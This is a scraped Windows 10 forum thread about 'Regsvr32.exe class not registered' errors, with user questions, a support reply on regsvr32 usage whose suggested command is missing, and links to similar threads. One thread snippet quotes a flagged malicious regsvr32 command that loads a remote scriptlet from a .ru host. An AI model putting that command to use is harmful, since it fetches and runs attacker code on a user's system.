Windows 10: Regsvr32.exe class not registered

Discus and support Regsvr32.exe class not registered in Windows 10 Software and Apps to solve the problem; Hello, so today when i turn on my windows10 a pop up appear "C\windows\system32\regsvr32.execlass not registered" can someone explain why this is... Discussion in 'Windows 10 Software and Apps' started by Rafa Anfero, Jan 14, 2022.

1. Regsvr32.exe class not registered

Hello, so today when i turn on my windows10 a pop up appear "C\windows\system32\regsvr32.execlass not registered" can someone explain why this is happening and how to fix it?

:)

Rafa Anfero, Jan 14, 2022
  2. SateeshP Win User

Registering the VB6.0 executable(.exe) using Regsvr32

Registering the my application executable(.exe) using command <FilePath> /RegServer but its failing to register in windows 10 but able to register .exe file with Regsvr32 .

is this correct way to do ?

is there any impact to register .exe using Regsvr32 ?

SateeshP, Jan 14, 2022
  3. Error RegSvr32 while startup

Hi Thurston,

I will be glad to help you with the issue you have with the computer.

Did you make any changes to the computer prior to the issue?

Regsvr32 is a command-line utility to register and unregister OLE controls, such as DLLs and ActiveX controls in the Windows Registry. Regsvr32.exe is installed in the %systemroot%\System32 folder in Windows XP and later versions of Windows.

Note On a 64-bit version of Windows operating system, there are two versions of the Regsv32.exe file:

• The 64-bit version is %systemroot%\System32\regsvr32.exe.
    • The 32-bit version is %systemroot%\SysWoW64\regsvr32.exe.
    Try one of the following methods when you receive a Regsvr32 error:

Method 1: Re-run the Regsvr32 command from an elevated command prompt

• To open an elevated command prompt, following these steps:
    Type Command Prompt in the Search box, right-click
    Command Prompt, and then click Run as administrator. If you are prompted for an administrator password or for a confirmation, type the password, or click
    Allow..

• Method 2: Use the 32-bit version of Regsvr32 to register a 32-bit DLL on a 64-bit version of Windows If you receive an error when registering a 32-bit DLL on a 64-bit version of Windows, follow these steps:
      • Open an elevated command prompt.
      • If the 32-bit DLL is in the %systemroot%\System32 folder, move it to the %systemroot%\SysWoW64 folder.
    Run the following command:

Perform the troubleshooting and reply with the results, we are happy to help you further.

Thank you.

Ruth Buruga, Jan 14, 2022
  4. Regsvr32.exe class not registered

Windows 10 64-bit problems registering sqldmo.dll using regsvr32.exe.

Initially I got error message with “Module sqldmo.dll failed to register…” when trying to install MSI package. Then I have tried unsuccessfully to register with regsvr32.dll.

I have a problem when trying to register sqldmo.dll with regsvr32.exe. If I try to run cmd

“C:\Windows\System32 regsvr32.exe sqldmo.dll “ -> I get incompatibility problem error message, which is fine as I am running 64 bit.

C:\Windows\SysWow64 regsvr32.exe sqldmo.dll -> I get NOTHING, no error, warning, absolutely nothing!

Please help!!!!! Customers install Software on windows 10.

SalomejaZalyte, Jan 14, 2022
Thema:

Regsvr32.exe class not registered

1. Regsvr32.exe class not registered - Similar Threads - Regsvr32 exe class

2. Regsvr32.exe class not registered

in Windows 10 Network and Sharing
    Regsvr32.exe class not registered: Hello, so today when i turn on my windows10 a pop up appear "C\windows\system32\regsvr32.execlass not registered" can someone explain why this is happening and how to fix it?...
  3. Regsvr32.exe class not registered

in Windows 10 Gaming
    Regsvr32.exe class not registered: Hello, so today when i turn on my windows10 a pop up appear "C\windows\system32\regsvr32.execlass not registered" can someone explain why this is happening and how to fix it?...
  4. regsvr32.exe as Malware

in Windows 10 BSOD Crashes and Debugging
    regsvr32.exe as Malware: Hello Team, We are observing Malware as Cloud IOC: W32.COMScriptletAbuse.ioc from the file path C:\Windows\System32\regsvr32.exe /s /n /u /i:http://server2.aserdefa.ru/restore.xml scrobj.dll. Can we delete or Uninstall the file will it affect the OS. Please let me know...
  5. Class Not Registered Error

in Windows 10 Support
    Class Not Registered Error: Every time I try to open my steam game a get this error Imgur. I have a newly installed version of windows 10. 83870
  6. Windows Search: Class not registered

in Windows 10 Support
    Windows Search: Class not registered: Windows Search stopped working. The event log shows the entry: The Windows Search service terminated with the following service-specific error: Class not registered If I attempt to start the service manually, a MessageBox pops up and tells me to check the Event...
  7. Explorer.exe "class not registered"

in Windows 10 Support
    Explorer.exe "class not registered": I remember having made some changes in Windows/system32 andsysWOW64 where I changed the file extension of the file"ExplorerFramae.dll to BAK" in both the folders and also copied theold file "ExplorerFrame.dll" as before,in bothe folders which was doefollowing instructions on...
  8. "Class not registered"

in Windows 10 Support
    "Class not registered": I get this error message every time I click on a link. How do I fix it. Thanks for your help. 46143
  9. Explorer.exe Class Not Registered

in Windows 10 Support
    Explorer.exe Class Not Registered: I am running windows 10 x64, version 16299.64. On my standard local user account which I do not use often is the problem maker.......All the ModernApps and the Start Menu do not work..........A box with title 'Explorer.exe' and message "Class Not Registered" pops out.......
  10. "Class not registered" problem

in Windows 10 Support
    "Class not registered" problem: Hello, Each time I start my pc, get popup notice about some "Class not registered" with some microsoft internet address. The notice attached here. What is it and how to fix it. Answers will be appreciated. Thanks 94329